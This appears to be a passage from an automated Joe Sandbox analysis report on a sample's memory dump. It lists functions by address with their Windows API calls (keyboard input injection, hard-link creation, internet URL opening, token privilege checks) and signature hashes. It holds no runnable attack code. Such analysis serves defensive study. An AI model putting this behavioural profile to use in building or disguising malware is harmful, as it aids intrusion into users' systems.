                                                      • String ID:
                                                      • API String ID: 3379773720-0
                                                      • Opcode ID: 4c7f9864d42e9b24e135cd0b1eb43596fc9d0c921e054c355223ac21600b1bf2
                                                      • Instruction ID: 235594aace9a57f74a94394187a179984a8379b1505e50dae520ec767bf47d26
                                                      • Opcode Fuzzy Hash: 4c7f9864d42e9b24e135cd0b1eb43596fc9d0c921e054c355223ac21600b1bf2
                                                      • Instruction Fuzzy Hash: B8414F74A00218ABEF11EF58DC45BEE7BB9FF44725F000059FD45E6291DB74A948CB62
                                                      Function 0086B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0086B89E
                                                      • GetLastError.KERNEL32(?,00000000), ref: 0086B8C4
                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0086B8E9
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0086B915
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                      • String ID:
                                                      • API String ID: 3321077145-0
                                                      • Opcode ID: e6c6a75089b37cc8bbe6923e99ee592b7d66ccb38b350096bc13e145509cbe47
                                                      • Instruction ID: 37a2a948d87f0e30625dcd038e33fc7b27802e09ea8168b6502395d2c7125412
                                                      • Opcode Fuzzy Hash: e6c6a75089b37cc8bbe6923e99ee592b7d66ccb38b350096bc13e145509cbe47
                                                      • Instruction Fuzzy Hash: F841E875600511DFCB51DF19C445A59BBA1FF49314F15C098ED8AEB3A2CB30ED41CB92
                                                      Function 00888851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 008888DE
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID:
                                                      • API String ID: 634782764-0
                                                      • Opcode ID: a7b3612107a510aaf5dc453987a412fc9808604bb4bf1661208048ae140e70ac
                                                      • Instruction ID: a0defdf04c5dc2e8b6ebe81832a75b2cf909aef4370541f4b10e455fd1258fc4
                                                      • Opcode Fuzzy Hash: a7b3612107a510aaf5dc453987a412fc9808604bb4bf1661208048ae140e70ac
                                                      • Instruction Fuzzy Hash: 80319234640109EFEF20BA68CC45FB97BB5FB09360FD44122FA55E62A1CF70E9809B56
                                                      Function 0088AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ClientToScreen.USER32(?,?), ref: 0088AB60
                                                      • GetWindowRect.USER32(?,?), ref: 0088ABD6
                                                      • PtInRect.USER32(?,?,0088C014), ref: 0088ABE6
                                                      • MessageBeep.USER32(00000000), ref: 0088AC57
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                      • String ID:
                                                      • API String ID: 1352109105-0
                                                      • Opcode ID: aa651fe3e5a56a5fbc48da9d41ce427a0b8502ba1a5a6e92a397cd20928c60a1
                                                      • Instruction ID: 6e7815c46c6c6d3cce7b0e297ab74c26a80270b413c053ec92405af2512b861d
                                                      • Opcode Fuzzy Hash: aa651fe3e5a56a5fbc48da9d41ce427a0b8502ba1a5a6e92a397cd20928c60a1
                                                      • Instruction Fuzzy Hash: CD416D30600519DFEF19EF58D884B6A7BF6FF49310F1881AAE915DB2A1D731E841CB92
                                                      Function 00860AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00860B27
                                                      • SetKeyboardState.USER32(00000080), ref: 00860B43
                                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00860BA9
                                                      • SendInput.USER32(00000001,00000000,0000001C), ref: 00860BFB
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: cb28cde595bbed39ce6bdfae03d488c8e3d6af0338974d186b5a531a1b207f41
                                                      • Instruction ID: eca9f9db6163f7d45ac8b82c6cdaeadaaf2eadccdcde3f319a616722e8168b3d
                                                      • Opcode Fuzzy Hash: cb28cde595bbed39ce6bdfae03d488c8e3d6af0338974d186b5a531a1b207f41
                                                      • Instruction Fuzzy Hash: 3C313730940218AEFB308B698C05BFBBBA6FB45339F18835AE581D21D2C7758D449B5A
                                                      Function 00860C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 00860C66
                                                      • SetKeyboardState.USER32(00000080), ref: 00860C82
                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00860CE1
                                                      • SendInput.USER32(00000001,?,0000001C), ref: 00860D33
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: 4c314b8977809cb9ed292a3a3543e1cf29b6fd32e79c575b8c8fd29c61f490f8
                                                      • Instruction ID: 63e21bcf501d16b3341e77874b2ca88c06d962f006a73cd292a0267e67901fbb
                                                      • Opcode Fuzzy Hash: 4c314b8977809cb9ed292a3a3543e1cf29b6fd32e79c575b8c8fd29c61f490f8
                                                      • Instruction Fuzzy Hash: 0131353094021C6EFF348B688804BBFBB66FB45310F15431AE581D21D2C7359D45CB5A
                                                      Function 008361C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008361FB
                                                      • __isleadbyte_l.LIBCMT ref: 00836229
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00836257
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0083628D
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      • Opcode ID: 269f377e79595205de0e5b7bf50ffd08c51111c838a25eccb2a1dc85b320a3b0
                                                      • Instruction ID: fa9b39869ea4a1804b0a33569817e8c295c5708dcb785262cbbe21f131c1b247
                                                      • Opcode Fuzzy Hash: 269f377e79595205de0e5b7bf50ffd08c51111c838a25eccb2a1dc85b320a3b0
                                                      • Instruction Fuzzy Hash: 7531A031604256BFDF218F69CC48BAB7BB9FF82310F168129E864D7191EB31D960D790
                                                      Function 00884EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 00884F02
                                                        • Part of subcall function 00863641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0086365B
                                                        • Part of subcall function 00863641: GetCurrentThreadId.KERNEL32(00000000,?,00865005), ref: 00863662
                                                        • Part of subcall function 00863641: AttachThreadInput.USER32(00000000,?,00865005), ref: 00863669
                                                      • GetCaretPos.USER32(?), ref: 00884F13
                                                      • ClientToScreen.USER32(00000000,?), ref: 00884F4E
                                                      • GetForegroundWindow.USER32 ref: 00884F54
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                      • String ID:
                                                      • API String ID: 2759813231-0
                                                      • Opcode ID: 8da7887ceff9f778ed91c31e7231cfbd9b0e9f153eb27cb3539dfbcf9cc0d789
                                                      • Instruction ID: 9a63ea80b78e3b997452ba6cc8fbeb2299f70df88cb65cc4db944e6108e7ca3f
                                                      • Opcode Fuzzy Hash: 8da7887ceff9f778ed91c31e7231cfbd9b0e9f153eb27cb3539dfbcf9cc0d789
                                                      • Instruction Fuzzy Hash: 84310F71D00108AFDB40EFA9CC859EFB7F9FF95304F10406AE555E7242DA719E458BA1
                                                      Function 00858656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0085810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00858121
                                                        • Part of subcall function 0085810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0085812B
                                                        • Part of subcall function 0085810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0085813A
                                                        • Part of subcall function 0085810A: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00858141
                                                        • Part of subcall function 0085810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00858157
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008586A3
                                                      • _memcmp.LIBCMT ref: 008586C6
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008586FC
                                                      • HeapFree.KERNEL32(00000000), ref: 00858703
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                                      • String ID:
                                                      • API String ID: 2182266621-0
                                                      • Opcode ID: 87a692b93412ea4e992cf9cce4bfc3bad55eab7254cf18932366cd98c6ef37d5
                                                      • Instruction ID: c5efa954c130ec3da3be79a38c571d2e6b36be4e6cbb7d16a5dff323cddba2d3
                                                      • Opcode Fuzzy Hash: 87a692b93412ea4e992cf9cce4bfc3bad55eab7254cf18932366cd98c6ef37d5
                                                      • Instruction Fuzzy Hash: BA214671A41109EBDB10DFA8C989BAEB7F8FB54306F15405AE844AB241DB30AA09CB90
                                                      Function 0082098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __setmode.LIBCMT ref: 008209AE
                                                        • Part of subcall function 00805A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00867896,?,?,00000000), ref: 00805A2C
                                                        • Part of subcall function 00805A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00867896,?,?,00000000,?,?), ref: 00805A50
                                                      • _fprintf.LIBCMT ref: 008209E5
                                                      • OutputDebugStringW.KERNEL32(?), ref: 00855DBB
                                                        • Part of subcall function 00824AAA: _flsall.LIBCMT ref: 00824AC3
                                                      • __setmode.LIBCMT ref: 00820A1A
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                      • String ID:
                                                      • API String ID: 521402451-0
                                                      • Opcode ID: 88835fda1c92e4077192062d843d9741e3fdfeef8a54bd3cb0b240720a7a1590
                                                      • Instruction ID: 3b3b43ef75a95017bbeff3d1feeec9871b1b20fd2651b91c3c9090c8cd8eea8f
                                                      • Opcode Fuzzy Hash: 88835fda1c92e4077192062d843d9741e3fdfeef8a54bd3cb0b240720a7a1590
                                                      • Instruction Fuzzy Hash: 36112B726041246FDB04B6BCBC479BE77A8FF45310F644125F106D61C3EE6058C54BB2
                                                      Function 00871767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008717A3
                                                        • Part of subcall function 0087182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0087184C
                                                        • Part of subcall function 0087182D: InternetCloseHandle.WININET(00000000), ref: 008718E9
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Internet$CloseConnectHandleOpen
                                                      • String ID:
                                                      • API String ID: 1463438336-0
                                                      • Opcode ID: d4f91a5cf545a76aa742cf90d649520fb6c9403541e80060cf488bbfe51be6b6
                                                      • Instruction ID: 5e148e17df2635453f15e02281074165bff86d92f8cbab45fd431f8694a45616
                                                      • Opcode Fuzzy Hash: d4f91a5cf545a76aa742cf90d649520fb6c9403541e80060cf488bbfe51be6b6
                                                      • Instruction Fuzzy Hash: 6721F631200605BFEF169F68CC45FBABBA9FF48711F10802EFA19D6955D771D810A7A1
                                                      Function 00863A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,0088FAC0), ref: 00863A64
                                                      • GetLastError.KERNEL32 ref: 00863A73
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00863A82
                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0088FAC0), ref: 00863ADF
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                      • String ID:
                                                      • API String ID: 2267087916-0
                                                      • Opcode ID: ef2bf2721b2c7bb7e5acf1463dde15da5a7b45dd6d5155c5dd33e5c04abbfe56
                                                      • Instruction ID: 802f4622443a5caaa06a73176d5c1cc44db1f3e11ada6d5cd390f9fa2a7bdfa5
                                                      • Opcode Fuzzy Hash: ef2bf2721b2c7bb7e5acf1463dde15da5a7b45dd6d5155c5dd33e5c04abbfe56
                                                      • Instruction Fuzzy Hash: 5E21B1305086118FC300EF28D88186BBBE4FE55368F144A2DF4A9C72E2D7319A06DB52
                                                      Function 008350E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00835101
                                                        • Part of subcall function 0082571C: __FF_MSGBANNER.LIBCMT ref: 00825733
                                                        • Part of subcall function 0082571C: __NMSG_WRITE.LIBCMT ref: 0082573A
                                                        • Part of subcall function 0082571C: RtlAllocateHeap.NTDLL(009E0000,00000000,00000001), ref: 0082575F
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      • API String ID: 614378929-0
                                                      • Opcode ID: c7ba92d1c158be5efb5143993e7bfe36f9acfd32b3e329c686cb477a91d82a4b
                                                      • Instruction ID: 5d668977d05c80681048010955b901e1f0e2492333cb3bb4e336bf297d2f458f
                                                      • Opcode Fuzzy Hash: c7ba92d1c158be5efb5143993e7bfe36f9acfd32b3e329c686cb477a91d82a4b
                                                      • Instruction Fuzzy Hash: 0811A072901A25AECF313F78BC45B5E3B98FF943A1F10492AF904DA251DE34898197D1
                                                      Function 008044A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 008044CF
                                                        • Part of subcall function 0080407C: _memset.LIBCMT ref: 008040FC
                                                        • Part of subcall function 0080407C: _wcscpy.LIBCMT ref: 00804150
                                                        • Part of subcall function 0080407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00804160
                                                      • KillTimer.USER32(?,00000001), ref: 00804524
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00804533
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0083D4B9
